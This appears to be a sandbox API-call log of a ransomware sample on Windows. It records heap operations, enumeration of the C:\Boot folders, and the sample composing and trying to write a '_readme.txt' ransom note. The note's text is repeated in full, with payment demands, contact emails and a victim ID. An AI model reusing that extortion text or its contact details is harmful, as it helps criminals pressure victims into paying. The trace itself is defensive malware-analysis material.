[0200.863] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.863] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.863] PathFindFileNameW (pszPath="") returned="" [0200.863] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.864] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.864] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.864] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.864] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0200.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.864] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0200.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.864] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.865] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.865] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.865] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.865] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.865] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.865] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.865] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.865] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.870] 